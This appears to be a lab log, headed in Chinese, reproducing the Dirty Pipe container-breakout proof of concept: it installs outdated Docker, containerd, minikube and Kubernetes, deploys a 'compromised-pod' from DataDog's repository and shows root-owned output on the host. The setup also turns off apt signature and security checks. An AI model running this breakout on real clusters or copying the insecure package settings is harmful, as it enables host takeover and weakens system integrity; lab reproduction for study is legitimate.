參考資訊:
https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/
https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.22.md#v1227
https://myyhhuang.com/2021/07/09/ubuntu-v21-04%E5%AE%89%E8%A3%9Dk8skubernetes-v1-21-2/
https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/dirtypipe-container-breakout
$ cd $ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb $ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb $ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb $ sudo dpkg -i containerd.io_1.2.0-1_amd64.deb $ sudo dpkg -i docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb $ sudo dpkg -i docker-ce_18.09.0~3-0~debian-buster_amd64.deb $ sudo apt-get update $ sudo apt-get install -y apt-transport-https $ curl -Lo minikube https://storage.googleapis.com/minikube/releases/v0.25.0/minikube-linux-amd64 $ chmod +x minikube $ sudo mv minikube /usr/local/bin/ $ sudo apt-get update --allow-unauthenticated --allow-insecure-repositories $ sudo apt-get install -y apt-transport-https ca-certificates curl $ curl -fsSL https://packages.cloud.google.com/apt/doc/apt-key.gpg | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/kubernetes-archive-keyring.gpg > /dev/null $ echo "deb [arch=amd64 trusted=yes allow-insecure=yes allow-weak=yes allow-downgrade-to-insecure=yes check-valid-until=no] https://packages.cloud.google.com/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list $ sudo apt-get update $ sudo apt-get install -y kubelet kubeadm kubectl $ sudo apt-mark hold kubelet kubeadm kubectl $ wget https://dl.k8s.io/v1.22.7/kubernetes-client-linux-amd64.tar.gz $ tar xvf kubernetes-client-linux-amd64.tar.gz $ sudo cp kubernetes/client/bin/* /usr/local/bin/ $ sudo minikube start --vm-driver=none $ sudo kubectl version Client Version: version.Info{Major:"1", Minor:"22", GitVersion:"v1.22.7", GitCommit:"b56e432f2191419647a6a13b9f5867801850f969", GitTreeState:"clean", BuildDate:"2022-02-16T11:50:27Z", GoVersion:"go1.16.14", Compiler:"gc", Platform:"linux/amd64"} $ cd $ git clone https://github.com/DataDog/security-labs-pocs $ cd security-labs-pocs/proof-of-concept-exploits/dirtypipe-container-breakout/ $ sudo kubectl create -f pod.yaml pod/compromised-pod created $ sudo kubectl exec -it compromised-pod -- sh No help topic for '/usr/bin/sh' command terminated with exit code 3 $ cat /tmp/hacked uid=0(root) gid=0(root) groups=0(root) ubuntu